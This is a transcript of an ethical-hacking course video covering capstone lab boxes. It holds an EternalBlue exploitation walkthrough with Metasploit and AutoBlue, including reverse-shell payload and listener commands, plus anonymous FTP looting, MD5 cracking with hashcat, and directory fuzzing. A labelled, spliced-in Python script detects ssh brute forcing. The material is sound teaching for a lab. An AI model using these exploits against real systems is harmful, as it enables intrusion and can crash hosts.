going to see on a report, and we talked about it in the brute forcing video, where if we're doing any kind of brute forcing we're doing it not only to see if we can get in with a bad password but to see if the client catches us. So in this example I'm just going to say hey, they didn't catch us, here's an example of what we did; also scanning in there as well, if they're not seeing a scan that's something that we're going to report back. So this would be typically a low finding, these would also be low findings; anytime we get access to a machine this is obviously a critical finding. So we just want to keep note of, you know, what kind of things we're finding, take good pictures, etc. So I'm hoping that you are getting the gist now of what your notes should look like. Again, make these your own, however it feels good to you; this is just how I kind of do it. I don't have to put a ton of information in there for me to remember, as long as I have my screenshots, which are most important because that's your proof that you were actually there and you did it, otherwise it's just a he said she said kind of thing. So that is it for this video, that is it for this section. Congratulations again for making it this far. Now we're going to move into some of the fun stuff where we get to look at a bunch of different attacks and gradually just get a little bit more complex and learn some new things along the way. And I like to call this a capstone because we're capping off all the things we've learned so far, and we're gonna actually build upon it too; you're gonna learn a bunch of new little techniques as we do this little mid-course capstone, and then we're gonna get into really fun stuff once we get into Active Directory. I'm really excited for that, so I will catch you over in the next section. Welcome to the course capstone. This is the 2021 edition of the course capstone, and we'll get into the old capstone, the new capstone and what the differences are, but the course capstone is meant to challenge you
and test your skills and knowledge up to what you've learned so far. Now not everything is cut and dry; these boxes are not meant to be particularly easy, they're actually meant to be learning experiences. So what that means is you are welcome to go through these machines on your own, give them a try. I realize that we have not talked whatsoever about privilege escalation, we have not talked about a lot of the tools that you're going to see, and this is by design. A course on hacking is not going to be able to show you everything, but you're going to get to pick up some ideas, and a little bit of googling, a little bit of frustration and really just getting in there, getting your hands dirty and seeing what you can come up with. So I encourage you to try these on your own in the order that they're listed; however, if you want to just watch and follow along, that's absolutely okay as well. Now I mentioned privilege escalation, but we'll talk about that here in a second. I want to show you the old course capstone and where the new course capstone is. So I have uploaded the new course capstone; this is not all the machines yet, this is just the ones that I started uploading. All you got to do is go in here and download these machines, you can run them with VMware or VirtualBox, I've got setup instructions for a couple of the machines; once you've seen one Windows or one Linux you can see them all and how to download them and run them, so that's pretty straightforward. The link will be provided in the resources or below the video, depending on what platform you're on. Now the old capstone, here's the old capstone, I have not pushed the new update yet, so this is what the old capstone looks like. You could see there were 10 boxes, there were five hours of material. The issue with the old capstone was that we were relying on a platform called Hack The Box. Hack The Box was a paid subscription platform, it costs anywhere from 10 to 15 a month,
I'm not sure exactly the true cost, but I realize not everybody can pay additional funds to go and use this platform to walk through these machines. So what we have done is we have made these machines available via YouTube, so I'm going to put this down below as well, but there is a series originally released called Pentesting for Noobs; if you look, all 10 of those machines are going to be here as well. So you're welcome to come to the YouTube channel and watch these videos. If you want extra content, extra walkthroughs, more of the practice and more of the capstone, you're welcome to go sign up for Hack The Box, do all that, but we are removing that dependency from the course. Now, these machines are going to require what is called privilege escalation. We are going to walk through privilege escalation; what I mean by that is we are looking at a box, when we land on the machine we are not root or we are not SYSTEM on that machine, we are a low level user, we have low privileges, and we need to escalate our privileges to the highest level that we can. So all of these machines except for one, at the time of this recording, are going to have some sort of privilege escalation involved. Now you're going to get to see some cool tooling, some different techniques and tactics, but it's not going to go into super depth on this. There are courses out there that we have created, we have two here, the Windows Privilege Escalation for Beginners and Linux Privilege Escalation for Beginners, if you are on Udemy; if you are on the Academy, same concept, Windows and Linux, just depending on the platform you're on and which one you prefer. So if you're interested in going after any sort of certifications, if you're interested in doing any sort of capture the flag or getting better at just escalation in general, I highly recommend these courses. If you're looking to stay kind of on that practical path then these aren't really necessary; it's really based on chasing certifications in the hacking
realm like your OSCP or some of the other certifications that might be out there; they use a lot of privilege escalation to test on, but again it's not really on the practical side of things, so it depends on what your motivations are and your reasoning. However, we are going to show them in this course only because they are a good introduction to hacking. It's good to see the other side, it's good to see some of the exploits that are out there, some of the thought processes that are out there, and then once we get into the Active Directory section it'll really take off from a practical standpoint and we're really going to start hacking like we are hacking in a real network, and it's going to get really fun. It's my favorite section in the whole course. So with that being said, go through the courses again in order as you see them, so however you see them in the list, go ahead and go through them. We're going to add more courses over time. As of right now the dependency is that you download these and install these for your lab; again, there will be instructions for those. In later attempts we are hoping to offload these to an online lab; unfortunately we won't be able to do that with Udemy, but with the Academy platform we should be able to do that, so we're working on getting that. But for now the Google Drive link that you see attached to the introduction video, this video, will have all the files that you need to download in order to complete this section. So with that being said, go ahead and complete the next box, I'll see you in the next video, and hopefully you rooted it. So before we begin the capstone I want to show you how to import a machine, and I'm going to show you, starting with Blue, how to import Blue, which is a Windows machine, and then we're going to go ahead and import a Linux machine in a later video, so that way you should know how to do both, though the process is exactly the same. So for Blue, what we're going to do is we're going to come into VMware here, and I'm going to show you
VirtualBox as well. We're going to go open virtual machine and you're just going to select the file that should be available to you here, which is Blue. I've already done that through the magic of editing so it's already here, and I'm just going to go up here and show you; we'll get to settings here in a second. For VirtualBox, same exact process: I'm going to go ahead and just go to import, I'm just going to paste the location in here, you can also use this to go find your file, and I'm gonna hit next and import. Okay, and it should start importing this file. So here we go, it's importing, it'll take 50 seconds, that's fine, gives me time to talk about the settings. So you can see here that we are in bridged mode. Okay, we don't want to be in bridged mode, let's go ahead and edit this, go to bridged and we're going to turn this into actually just NAT. Now you can choose how much memory you want to use here; mine's set to four gigs, that's fine, I've got a lot of RAM; if you do not, then go ahead and maybe turn this down to two gigs, which would be absolutely fine. Okay, so I'm gonna hit okay here. Now I'm gonna power on this virtual machine and then we're gonna wait for the other one to finish importing, which it has. So here, while we're waiting on this, go ahead and go to settings and you're going to want to do the same thing: so network, no bridged, don't do bridged, we're going to do NAT. Okay, and then we're going to just enable the network adapter here. So you should have your NAT network set up, remember that when you did that originally with our settings; if you need to you can go back to tools, you can go to preferences, come into your network, make sure your NAT network is set up. Anyway, come in here, you can go to your settings and again make sure that this is on NAT, or NAT network, I apologize, NAT network right here. Okay, and then I'm going to hit ok, and then all you need to do is power this on. I'm gonna show you with VMware, it's gonna be the same process. Now you can log in as the
administrator; you're gonna get credentials for every box, that is for the sole purpose that you can access the IP configuration and find the IP of this machine, okay, just to make it a little bit easier. So there will be an accounts file in here, and here you can see the administrator password is password456!, so we're just going to do that and we're going to make sure that this box is online and that we can communicate. So I'm going to quickly go to command, and you can install VMware Tools if you want, make this pretty, all that jazz, I'm not going to do that here, I'm just going to quickly figure out what's what. You can see 192.168.138.135. I'm going to come over to Kali Linux; I've got a scan that we did for 134 up, but that's okay, I'm just going to ping 192.168.138.135, okay, and you can see I'm getting a response back, and that's it. You need to make sure that you can communicate with your machine, so if you're running VirtualBox make sure you spin it up, you log in, you figure out what your IP address is and go from there; very, very straightforward. So that is it for this video. Go ahead and attempt to attack Blue, see if you can figure out what the deal is and where you can go and how you can exploit it, and meet me in the next video once you've attempted it to see if you were able to successfully root or system this machine. Thank you. So let's start by taking a look at our nmap scan. Now the IP address I got was 192.168.138.135, and not a lot of ports came back, so we got 445 back, and we can scroll through, get a little bit of information, like we see a NetBIOS name on this machine, we see that it's running Windows 7 Ultimate 7601 Service Pack 1, doesn't appear to be part of a domain, just a workgroup, same thing, WORKGROUP, authentication level user, and really there's nothing here that is a big indication as to what this could be. So when we have this, as we discussed before, when we're looking at SMB specific vulnerabilities, because that would be my
guess here, the vulnerability would be SMB related, we need to enumerate SMB in one of two ways, really. The first of that being, well, can we search based on version information that we see here, can we search on this and see if there's anything vulnerable that could be there. Second of all, if we can't find anything right off the bat for this, maybe then we can go and use something like smbclient, do some enumeration, maybe there's a null session we can connect to, maybe there's a file or something, some sort of information with a username or password or something along those lines that gets us into this machine; otherwise we're pretty much stuck with version information. Okay, so we're gonna go ahead and just copy this, and there's a reason that this is the first machine in our run-through of the capstone, because this is the easiest, or should be the easiest. So we're going to go ahead and go out to Firefox and I'm just going to go to google.com, come in here, we're going to search for this and we're going to search for exploit, it already knows me, and we can look through some of these and see if there's anything here that really stands out. First thing for me, we've got a few, we got one here, one here, these don't necessarily say what they are, so we might need to click into them. MS17-010 keeps popping up quite a bit. Let's see if it tells us anything here about architecture; it really doesn't, it just shows up as this, so we'll have to do some reading into this. This is a local privilege escalation, doesn't really help us because we're not doing privilege escalation at this point, we're just looking to see if we can even get on this machine. Okay, this shows us hey, MS17-010, this is an exploit for it written in Python, it looks like, and it says hey, okay, this could be our target. So we're going to take two different paths here: we're going to look at it first in Metasploit and then we're going to take it from a manual path, and we're going to see
if this is indeed what we're after. So let's go ahead and just go to msfconsole, and yours might look a little bit different than mine depending on what version of Kali you're on, but the process should be the same. I'm on msf5, so we're going to go ahead and just search eternalblue, and I do know recently they combined all the EternalBlues into one, so again yours might be a little bit different than mine, but it should be the same process or concept. Now the first thing we want to do is we want to look up this SMB scanner, right, we want to do an auxiliary. Our auxiliary modules are going to tell us what is there; it's going to be a check, it's not going to be so much an attack, it's more of scanning than anything else. There are some attacks in auxiliary modules but they're not full on exploitation. So let's go ahead and just say use 1, and we're going to go options in here, and all it's going to do for us is it's going to come in here, we're going to provide it with our RHOSTS, we're going to run it and it's going to provide a check. Okay, so we can just say set RHOSTS to 192.168.138.135, whatever your IP address is, and then I'm going to say run, and it says host is likely vulnerable to MS17-010. Okay, there's a second way to do this. So let's go ahead and just search eternalblue again; you can also search ms17-010 or however you want to do this, it should all show up. I'm going to use this number three here, the EternalBlue one. We do know that we're on Windows 7, so the Windows 8 one won't work for us, and psexec we could run, but I'm going to go ahead and just use the one that is most popular and works usually out of the box. So let me go ahead and just say use 3 and type in options, and in here we have a verify option, which means we should have a check option here. So I'm gonna again just say set RHOSTS, I'm gonna show you the check feature, 192.168.138.135, okay, and then I'm going to say check. All right, and so check did exactly what the auxiliary
module did for us: it says hey, it's vulnerable, okay, they're likely vulnerable. So what we need to do is we need to set a payload here. Now something that you might not know yet at this point is that payloads by default are set to 32-bit, at least in this example, because there could be a 32-bit exploit in here; actually this says 64-bit, so I could be lying to you. Some payloads are set to 32-bit to start; because we know that this is a 64-bit machine, or at least should be given that it's Enterprise, we're gonna go ahead and set this to 64 bits just to be safe. So this is a practice that I take on: if I know the architecture of the machine I'm going to go in here and set my payload for myself. Now this should be 64-bit, but just to be safe we're going to type in windows and hit tab, because it only auto-completes to 64-bit, this is perfect. Now I think where my mind was going is that I want this to be a Meterpreter shell, and I don't know if it defaults to Meterpreter, it might default to a reverse TCP of some sort, so we're going to go ahead and use a Meterpreter shell because we want a nice interface to have. So I'm going to go ahead and set that, options one more time, and I'm going to look at the LHOST here, and we could just say set LHOST to, we could just call it eth0, or you could set your IP address in here; again you can ip a or ifconfig, and whatever your IP address is. I'm running on eth0, so whatever you choose you could place here as well. So I'm gonna go ahead and run this. Now while this runs, this might not work on the first go, it might not work on the first few goes; this is to try going through what are called different sets of grooms on here, and it looks like it worked right away, but sometimes this doesn't work right away, and if yours doesn't work right away that's okay, it might take a few attempts through this first process and you might have to hit run a few times for this to go. Now I have chosen using Blue, or EternalBlue, for
this course because it's so relevant. This is a four year old exploit now and I see it on so many internal penetration tests, it's not even funny; like, I wish it would just go away, but it is this easy to run and just get on a machine and gain access, and it's incredibly easy and incredibly prominent in environments. Think about environments where they have systems running that they can't update or do anything with and you have this, or they just have poor patch management and you have this. It's so easy to get a machine, and then you come in here and you say hashdump and you dump out the hash, and now we've got the administrator hash; we can go try to crack that, we can do pass the hash, which we're not there yet, we're going to get there in the Active Directory section, you're going to see what the differences are on this kind of stuff, but you can utilize these hashes to your advantage, and we're going to play around with that a little bit later in the course. So with that being said, this is something that you will likely see if you do become a pen tester, you'll see this in an environment, and it is really this easy to get into a machine like this. So we have used this now to come through here and gain access. We're going to go ahead and go back and we're going to try doing it again, but we're going to do it through a manual method. So I'm going to open up a new tab, all right, and we're going to come in here and I'm going to search Google. Now if we want to go look for manual methods of exploiting a system we're likely going to use GitHub, perhaps Exploit Database. Now this Exploit Database one I'm not going to use, only because it gets a little tricky with EternalBlue, there's a few things that we have to do; I don't believe this one is just one that runs right out of the box, it has a little bit more to it than what it's letting on. Now we might need to reboot this machine, by the way; we'll give it a go and see if it works. It might not work out of the box because we've
already exploited the system, but we'll try anyway. So what we might want to do is search something like eternalblue, and we might want to say github, okay, and we can come through here and look through different ones. I like to open a few and I like to look at them and read the amount of stars that they have, read the descriptions that they have, detailed walkthroughs, you know; all these have decent stars, this one doesn't have a great walkthrough, this one has a very good kind of detailed walkthrough, has video tutorials, has a decent amount of stars, and I honestly like it. So we're gonna go ahead and just get the AutoBlue one from 3ndG4me. So go ahead and find that and get to this; we're gonna go ahead and copy this code, and there have been commits since 2021, so that's great, there's recent commits to this, which is awesome. So I'm going to go ahead and cd into /opt, I'm going to git clone this... and that's not what I should have been copying, I should have copied this, but we'll try it one more time and paste here. All right, and I'm gonna cd into AutoBlue, and it gave instructions in here somewhere about how to install this. Let's go to installation: pip install requirements for Python 3, which we should be on at this point, so we're going to do pip install -r requirements, just like that, let that install. Looks like everything is satisfied or installed, so that's good. From here we're going to go ahead and do the usage. Now there was a checker in here, so we can run python with the checker; I don't know, it says python 2, so let's go ahead and run python 2 with it; it could be python3 too, so we might run into an issue. checker.py 192.168.138.135.
target is not patched, testing name pipes. Okay, so this is something that I actually use on an assessment: regardless if it's this or the Metasploit version, I will take a screenshot of this. There are reasons sometimes where we won't run the exploit; if the environment has critical machines running, for example like in a hospital, I might not run this exploit, because this can take down a machine, and if I don't know what machine I'm taking down, who knows, in a hospital, right, you don't want to make that mistake. So it's always better to play it on the safe side when we're running these exploits. If you don't know, you can always ask your client, say hey, I've got this machine, here's the IP address, I want to run this exploit, is that okay, and get permission first. Now there's a lot of ways, which you'll see when we get into the Active Directory exploitation part of the course, that we can compromise the domain and we can run all kinds of exploitation, own the whole domain controller and not worry about tipping over the server by any means. This can tip over a server, so you want to be safe with these kinds of things. So with that said, I'm going to show you how to run this manually, but it's going to tip your box over. I'm going to give the secret away: it's going to tip your box over, and this is going to be the lesson learned from running this exploit. I'm going to show you the proper way to do it manually; with the version we have it's not super easy to get a shell from the manual method, we could go around and play around and find one that works, but I'm going to show you this from a "here's how you would run it manually" angle, but also "here's the dangers of running this in an environment". This is a perfect box to show you why we just don't go run remote code execution on machines in an environment, because this can take down a machine. So let's go ahead and run through the process; I'm going to show you the process and then we're going to knock this machine
over so first thing we're going to do is we're going to cd to the shellcode directory and we're going to run shell_prep.sh and i'll save this now and watch the the exploit will work fine so oops we're going to go ahead and just hit yes here and then we're going to enter in our reverse connection 192.168.138.128 is mine i'm going to say 99999 for this we can do 222 for x86 we're not going to use it now we have the opportunity to use a meterpreter shell or generate a regular command shell if we do the meterpreter shell we can go into meterpreter and we can actually run it in the sense that we use a multi-handler and pull down it's basically a listener it is a listener and it's going to pull down a meterpreter shell for it so it's just the shell code that we're generating we already used a meterpreter shell to get the first shell on this so now we're going to go back and we're going to go ahead and try to do this with a regular command shell so you can press zero if you want to try the meterpreter shell method you can also press one to generate the regular command shell method we can go ahead and just do the regular command shell uh we're going to generate a stage payload stage or stages here should crash this crash this machine um the other thing we're going to do is we're going to run this listener_prep.sh once this is all done so it's doing this for us we're going to go ahead and cd back in a second once this is done all right now i'm going to cd back and we're going to do listener_prep.sh and this is going to run a listener in metasploit for us which is nice we could just as easily run this with netcat we can just say nc -nvlp like we have before nc -nvlp like this and whatever port we're listening on all nines before so we're gonna go ahead and just let this run its course as intended and we're gonna do 99999 we did two two two two here and we're going to go ahead and say regular command shell all the same things we did before stage payload and it's going to
start this up for us hopefully start up some listeners and you should see a lot of work just go in okay it's got all those listenings waiting for any sort of connection to come through so the next thing we're going to do is and it is using the multihandler for us already it's just using a shell reverse tcp instead of a meterpreter reverse tcp here so last thing we're going to do is run the exploit so we're just going to say python eternalblue_exploit7.py our target is 192.168.138.135 path to shell code is just shellcode and then sc_all.bin and we do not have to provide a number of groom connections that's optional we're going to run this and we'll cross our fingers you never know might work doesn't look like it's working uh we've blue screened the machine so this this is a perfect example of why you just don't willy-nilly run this in an environment okay so a good lesson learned honestly because if you're in a critical environment you have no idea what that machine does imagine that this was something in a hospital controlling equipment that was being used during surgery who knows if you took that down it could be very very very bad so it's good to see the other side of it again get permission before running something like this unless you know that your environment's safe it's okay to take down some machines etc but usually that's not the case so with that we're going to go ahead and move on to the next machine hopefully you got this and got through the walkthrough just fine so i'll see you in the next machine as we walk through that and hopefully take down another box okay in this video i'm going to show you how to quickly open up the academy machine in both vmware and virtualbox and how to set it up after this you should have seen a linux setup and a windows setup so you should have no more issues setting these up i have full faith in you beyond this so repeat the process if you need to
go back watch the video just come back and watch one of these anyways we're going to open a virtual machine if you are in vmware i'm going to go into my folder that has it capstone and i'm going to go to academy and just double click open that up it's going to ask me where i want to put it i'm going to go default settings you can choose wherever you want i'm just going to hit import it's going to take a minute to import while that's happening i'm going to show you and you might see a retry just go ahead and hit retry on that should work while we're waiting i'm going to go ahead and show you the other side of things which is virtualbox go ahead and hit file go ahead and hit import appliance and then just go select your file i've got it for copy paste purposes it's a lot easier and vmware thinks it can just take over it's wrong so in here make sure you just have your ovf file that you downloaded hit next and then come in here and you're going to see these settings you can go ahead and just run the default settings for now and just import we'll change the settings once we have it imported so go ahead and import that on vmware we're just going to ping pong back and forth real quick under the settings for the academy go ahead and just hit edit virtual machine settings in here this is a linux machine so one gigabyte of memory is fine we don't need a lot come to your network adapter and make sure that it says nat and not bridged hit ok go ahead and log in now you can power on this virtual machine get that going in the next video i'm going to show you the password which is just root tcm same thing here on the academy go ahead and go to settings we're going to go to network make sure your nat network is selected remember we created in that network make sure your nat network is selected and that you are on the same network as your kali linux machine or you will not be able to communicate with it so with that out of the way you can go ahead and power this on
depending which one you're on catch me in the next video when we will talk about logging in finding the ip address and getting started with attacking this machine i'll catch you over in the next video all right on to the next machine this one is called academy and this was created by alec especially for us now we're going to attack this machine and we're going to get a low-level user we're going to pivot into a second low-level user and then we're going to root this machine if you did not root this machine do not stress about it these boxes are meant to be hard if you are a beginner and you are meant to walk through with us and see all these different techniques tips and tricks and just the idea and mindset as well so do not stress if you are having issues trying this on your own that's 100 okay so i have imported the machine you should be familiar with this at this point all i'm going to show you is how to log into the machine similar to what we did with the windows box now the password here the username is root the password is tcm tango charlie mike okay we come in we're going to run dhclient dhclient hit enter okay mine says file exists that's because i already ran this you go ahead and run it it should take a second to load once that loads go ahead and type ip a and you should get an ip address back okay mine says 192.168.138.129 yours might say something incredibly different but go ahead and go with whatever the ip address says here because that's what you're going to use now with that out of the way i went ahead through the magic of editing and ran an nmap scan you're welcome to do this as well dash capital a dash p dash dash t4 ip address nothing new at this point okay what came back for us was a few different things here we have port 21 open and we have a vsftpd say that three times fast 3.0.3 and it says anonymous ftp login is allowed okay it says hey there's a note.txt in here okay that could be interesting now keep in mind everything that we're doing
in these machines is going to be very gamified very ctf or capture the flag and that's exactly what we're doing is we're capturing the flag so don't stress about this being incredibly realistic at this point we're gonna get into the more practical stuff as we get into the active directory pen testing section we're really just trying to focus on some of the the basic concepts and some of the things that you'll see if you go do any ctf events or you go on to any other certifications or anything like that so this is a good introduction kind of jump into the the pool maybe get your feet wet first into hacking so with this in mind we've got port 21 we've got port 22 we've got port 80. now 80 is a web server 22 is ssh my strategy here when i see port 22 i immediately erase it off the board now that's not to say that it couldn't have an option of attack here you could brute force it you could go in there and try like a root username or if you knew other usernames you can go in there and just try to brute force the password and maybe you get lucky and log in usually on ctfs that is not the intended route now for things like say example a pen test you might want to brute force ssh because there's a couple reasons one is is there a weak password can i log in with a root user on a weak password for this machine if so that's bad do you tell your client hey this is bad you're using weak passwords number two you want to see if your client can pick you up meaning do they detect you when you are running brute force scans if you have 500 attempts against an ssh login and you're still able to go attempt after attempt and nothing has been detected you have not been prevented on the network then that's an issue you should probably bring that up to the client say hey i ran brute force against this login and you didn't detect me you didn't see me you didn't see me do anything we'll talk about that more in the report writing section and some of the things we talk about detection wise but 
that's another example of something you want to test for and see if you're detected you're testing detection throughout an entire pen test so you want to say hey did you see me scanning did you see me brute forcing did you see me running exploits did your antivirus pick me up where was i caught during this pen test and where can you improve so something about ssh a little tangent there but with that out of the way port 21 is open port 80 is open now we see down here that it says hey we're getting an it works page which means that it's just a default apache 2 web server we can go out to this web server and just take a look 192.168.138.129 you can see this is just a basic hey it works apache 2 debian page that tells me that we're likely running on php on the back end though that doesn't mean that entirely this is just kind of an indicator when we see apache i'm assuming php on the back end so let's go back here now we could do a couple things we need to identify what's going on behind the scenes because all we're seeing is a default web page which by the way this is a finding on a pen test so you would say hey this is just revealing too much information why do you even have this out there is this web server meant to be up if it is then take away this default web page and make it uh you know make it say hey if you're not supposed to be here then don't be here anything but a default web page because all we're seeing is architecture here if it's not supposed to be there from a hacker's perspective this means poor hygiene you're just leaving ports open you're just throwing computers on the network and on the internet willy-nilly and this just means that you likely have poor hygiene and we want to look into you further because if this is something you're doing you might be using bad passwords or not patching etc etc so anyway off that tangent going back to the scan i'm curious to know what the note says we'll go check that out we have anonymous login so we'll start there
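Added example, not part of the course material: the detection side of the ssh brute-force point made above. A small parser reads sshd entries from auth.log, flags a source IP once it has a burst of failed logins inside a time window, and raises the severity when an accepted login from that IP follows the burst (the guessing likely worked). The log lines, hostname, usernames and threshold are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd entries in syslog format (sample data, not a real log).
# 192.168.138.131 plays the tester's box from the lab; 192.168.138.50 is a
# legitimate user who mistypes once and then logs in normally.
SAMPLE_AUTH_LOG = """\
Jan 10 09:00:01 academy sshd[2201]: Failed password for root from 192.168.138.131 port 50001 ssh2
Jan 10 09:00:02 academy sshd[2203]: Failed password for root from 192.168.138.131 port 50002 ssh2
Jan 10 09:00:02 academy sshd[2205]: Failed password for invalid user admin from 192.168.138.131 port 50003 ssh2
Jan 10 09:00:03 academy sshd[2207]: Failed password for root from 192.168.138.131 port 50004 ssh2
Jan 10 09:00:04 academy sshd[2209]: Failed password for root from 192.168.138.131 port 50005 ssh2
Jan 10 09:00:05 academy sshd[2211]: Failed password for root from 192.168.138.131 port 50006 ssh2
Jan 10 09:00:09 academy sshd[2213]: Accepted password for root from 192.168.138.131 port 50007 ssh2
Jan 10 09:05:00 academy sshd[2301]: Failed password for alice from 192.168.138.50 port 40001 ssh2
Jan 10 09:07:30 academy sshd[2305]: Accepted password for alice from 192.168.138.50 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2024):
    """Parse one sshd password event; syslog omits the year, so one is assumed."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag a source IP once it has `threshold` failed logins inside `window`.

    The alert is raised to high severity when an Accepted login from the same
    IP follows the failure burst within the window: the guessing likely worked.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    alerts = {}                   # ip -> alert (one per source)
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue              # not an sshd password event; ignore
        q = recent[ev["ip"]]
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:
                q.popleft()       # drop failures that fell out of the window
            if len(q) >= threshold:
                alert = alerts.setdefault(ev["ip"], {
                    "ip": ev["ip"], "failures": 0,
                    "severity": "medium", "success_user": None,
                })
                alert["failures"] = max(alert["failures"], len(q))
        else:
            alert = alerts.get(ev["ip"])
            if alert is not None and q and ev["ts"] - q[-1] <= window:
                alert["severity"] = "high"
                alert["success_user"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        tail = f", then logged in as {a['success_user']}" if a["success_user"] else ""
        print(f"{a['severity'].upper()}: {a['ip']} had {a['failures']} failures{tail}")
```

Five failures in a minute is a deliberately low bar for a lab; in production the threshold and window are tuned per environment, and the same logic applies to the ftp and web logins seen on this box.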
and then we're going to go ahead and take a look at the different pages that could be hiding behind the default page so i'm going to leave this up and now we're going to go take a look first at the ftp so in here i'm going to make this bigger okay so ftp all you got to do is 192.168.138.129 or whatever your ip address is and then i like to just type anonymous twice okay we get an anonymous login we are successful we can come in here and say ls all right and we have a note.txt in here so all we need to do is type in get note.txt that's it and we're pretty much done so the option here is we have ftp open now there's a possibility that we could utilize this so we have the ability with ftp to put files and get files we just got a file we can come put something on here the only issue is we don't know where on this machine that this note.txt is stored if for some reason this note file was stored in like the i don't know this apache server if we came in here and we just went like forward slash note.txt and we saw it all right then that could be of interest because we know the directory that we're in we could come in here just upload malware come up here execute the malware because we have execution and then we could get a shell and keep pushing forward but in this instance we don't know where it is it's there's a good chance it's not even in the web server if for some reason it wasn't the web server we could use that to execute and that is a strategy that we might see at some point but here in this instance unless i know where this is the ability to put files in here does nothing for me in a real world scenario maybe maybe we can go look at uh getting social engineering or getting somebody to open a file or or something along those lines but for here for this capture the flag type style we are only focused on getting this note and that's pretty much it also secondary finding on a pen test would be this because we see apache 2.4.38 it's telling us it's running a debian
server which means we're attacking linux so if we were doing this blind didn't know that now we know we know the apache version we know debian we're getting a little bit of information and we're just compiling that information right now debian server apache php most likely okay all of this is information gathering that's all we want to do is gather as much information as possible now let's go ahead and exit out and i want to just cat out this note.txt okay so it says hello heath grimmie has set up the test website for the new academy i told him not to use the same password everywhere he will change it asap i couldn't create a user via the admin panel so instead i inserted directly into the database with the following command all right so we get um the looks like a database information here with values now it says the student reg no number is what you use for login so student reg no here you see this ties up to the first and then we see student photo and there's nothing in for the student photo we see password then we get password here student name okay pin code going on so this is pretty sensitive information if this were on a pen test which i've actually seen something similar to this i've been on pentest where i have seen open ftp servers i've seen open web directories where they had backups of their entire website on there with database passwords and everything it is uh it's realistic in a sense that you could run into something like this it would be pretty pretty bad so anyway this is coming from our friend jdelta and we're gonna go ahead and just grab this password here we've got this we've got this now the issue is this is likely not a password this is likely a hash and we can copy this and see first before we go down that route this might be a password but we can copy and let's just take a quick look we can go let me see the back out of this here um we can do something like this we can type in hash-identifier like this and just hit enter okay this is
built into kali linux you just go ahead and paste selection hit enter and this will tell you all the things that it thinks it is this is saying hey most likely it's an md5 hash okay so we have an md5 hash guess what we can crack that hash i'm going to go ahead and exit out of here and ctrl c and if we go to google and do a quick google search so i'll give you time to go to a go do a google search but all you have to do is say hashcat which is the tool we're going to use to crack this password crack md5 hash here we get a blog this is how to crack md5 hashes you go into that and it says hey in order to do that you need to run hashcat dash m for module and 0 with your hashes file and then a password list like rockyou.txt so we haven't gotten much into hash cracking in this course and we're going to talk about a little bit we'll talk about it a lot more when we get into the actual active directory hacking because we start cracking passwords there becomes a lot more important here we're just going to play around with it a little bit so i'm going to show you this only this one time i'm going to show you this on on a linux machine this is running in a virtual machine here okay so we're running hashcat we're about to run hashcat in a virtual machine typically we do not want to do this because hashcat is going to be running off of our cpu okay it's going to be running off our cpu inside a virtual machine that's going to make it run a lot slower hash cracking runs off of gpus okay so we're running off of the our graphics card not our cpu so we want to do that so when i run hash cracking in the real world or even later in this course you're gonna see me running it on windows because that is my base operating system i will take that i'll run it off there because it's going to use my gpu it's going to use my graphics card and that's what i want so in this instance it's going to go a lot slower but because it's going to be an easy password to crack we don't have to worry about
it too much but if you want to be good at cracking passwords and practice that definitely make sure you're using it on your base os regardless of what it is because it's going to crack a lot faster than running it in your virtual machine so we're going to do a hashcat actually before we do that go ahead and type in locate rockyou.txt you should have it somewhere okay you might have a tarred version of it or a gzip version of it you can open that if you navigate to this folder like user share come in here to your folder like literally go into browse network or file system and go into user share et cetera you can get there if for some reason you do not have rockyou.txt in the later version of kali they already have it here so i'm assuming that it's here if not if all you see is a gzip go ahead and just unzip that now what we're going to do is we're going to say actually one more thing i forgot you can go ahead and do a mousepad or gedit or whatever you want you could do a hashes.txt copy and paste the hash it's a little small probably for your screen from what you can see here copy and paste the hash into this hashes.txt the one we got right here okay make sure it's in a file so once we've done that go ahead and run hashcat with a dash m of zero that's a module so we're going to be attacking the module of zero which correlates to md5 hashing we're going to give it the file of hashes.txt and we're going to give it a word list to run through of rockyou.txt okay and i'm going to scroll up just so you can see this it's going to run it might take a minute to run it took me a couple seconds here um gets through it pretty quick rockyou runs fairly fast on a vm and this one picked it up pretty quick so the password of what's coming up is student password of student not very great password weak password policy okay so we have a username we have a user id we have a password of student but we have no idea how we're going to do this okay where are we going now i can take some
educated guesses here like for example they're saying hey this is for the new academy and this box is called academy and there's a good likelihood that if you were to do a forward slash academy on the webpage that maybe you find it right and we can go academy and go find it but i don't want to just show you and cheat so let's go back and we're going to walk through it we talked about directory busting with dirbuster i want to show you a couple other tools that we can use and show you the pros and cons of both of them so open up a new tab make sure we're going to use two different tools so i want to show you both go ahead and use a tool called dirb d-i-r-b and for dirb all we have to do i do believe is just type in 192.168.138.129 and hit enter so this is going to go off of the website it's going to run on its own word list it's going to go in here and try to find stuff immediately i found phpmyadmin the issue is with this it's just going to go in and start like going in and going into the phpmyadmin and looking for directories and it's finding all kinds of directories and this is going to take a minute so this is one way of doing it another way of doing it is using a tool called ffuf i don't know how you say it whatever everybody's got their own pronunciation if you do an apt install of ffuf like this you hit enter i already have it but yours should pick it up okay we're going to run the tool just like this so we're going to say ffuf once yours is installed do a dash w that is for word list and your word list should be in /usr/share/wordlists and we can do dirbuster that's fine this is where all the word lists are and then i just like to double tab or tab around and we're going to use the medium word list that's my my go to for most cases we could use the lowercase if we wanted to um i think either are fine okay from here i'm gonna go ahead and um we're gonna go ahead and back up and now what i'm gonna do is i'm gonna put a colon here and i'm gonna type in FUZZ
